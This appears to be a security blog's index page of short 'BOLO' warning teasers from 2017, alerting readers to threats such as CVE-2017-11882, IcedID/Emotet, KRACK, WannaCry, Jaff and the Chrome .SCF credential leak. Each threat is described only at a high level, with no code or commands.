This post is worthy of a BOLO. Fixed earlier this month in the Patch Tuesday updates is a bug that has existed in all versions of Microsoft Office. This bug, CVE-2017-11882, exists in the Equation Editor, which allows users to enter mathematical formulas in Office documents. These formulas exists as OLE (Object Linking and Embedding) objects […]
BOLOs
BOLO: IcedID Banking Trojan/Emotet Trojan
A unique banking trojan called IcedID is hitting businesses throughout the US and Canada. In most implementations, IcedID is being bundled with another Trojan called Emotet and delivered via spam Email of infected Word documents. What makes IcedID unusual is that it propagates through a business network. It sets up a Command and Control channel […]
BOLO: WPA2 WiFi KRACKed. Ouch!
Perhaps a more apropos title would be: When “Nonce” is not enough! Holy cow, Batman, we’re in for a bumpy ride. The WPA2 protocol is vulnerable to an attack “in-the-wild” called Key Reinstallaton AttaCK (KRACK). This affects both Client devices and Servers (Router/Access Point). A “Nonce” is a number, usually generated in a pseudo-random fashion […]
BOLO: Defray Ransomware
Proofpoint has identified a new type of ransomware called “Defray“. Two highly-targeted ransomware attacks have been directed at the Healthcare and Education sector, and another at the Manufacturing and Technology sector. As Proofpoint points out, the attack is not of the “spray and pray” variety like most other ransomware attacks. This suggests a very specific threat actor. […]
BOLO: PowerPoint Order/Invoice Exploit
This is another Office document infection that can occur without the benefit of Macros. The active malware associated with this exploit is called “Zusy” and affects Microsoft PowerPoint. The infection occurs when the mouse is moved over (Mouse-Over) a warning hyperlink. PowerPoint inexplicably invokes PowerShell, allowing the exploit to install. When the user opens […]
BOLO: FireBall Browser Malware
Checkpoint Software Technologies reported an outbreak of browser-based Malware called “FireBall“. This malware delivers unwanted ads and popups and completely takes over your web browsers. It was created by the Chinese advertising company, “Rafotech“. FireBall gets installed as a bundle from other legitimate programs downloaded from the Internet. However, it has a great deal […]
BOLO: Chrome Spreads Your Creds!
There is a vulnerability that exists in the current version of Google’s Chrome browser that can allow your Windows Login, or Network Login, credentials to be pilfered by a remote hacker. The problem occurs by having Chrome download a harmless .SCF file. These files are very much like the .LNK files of old. SCF stands […]
BOLO: WannaCry(pt) RansomWare
First observed in February the WannaCry, or WannaCrypt, virus is wreaking havoc in European networks. Major outbreaks of a new variant were first detected Friday, 5/12/2017 in Spain but it has now traveled to over 99 countries. It also took out England’s National Health Service (NHS). The virus is web-based and spreads from users clicking […]
BOLO: Netrepser Espionage Trojan
Netrepser is a JavaScript (JavaScript ≠ Java) Trojan designed for espionage purposes. This was detected and reported by Bitdefender on May 5, 2017. Believed to be of Russian origin, the common distribution of this Trojan is by Email. However, its JavaScript nature suggests that this may be able to cause infections in web-based “Drive-By Download” […]
BOLO: New “Jaff” RansomWare
Yesterday, May 11, 2017 a new type of ransomware was released called “Jaff”. This is spread via the Necurs Botnet using Email as the transmission media. Considering last weeks exploits of Google Gmail accounts, I suspect this will eventually migrate to appear as Emails from legitimate friends. Beware of any emails with the subject lines […]
1 2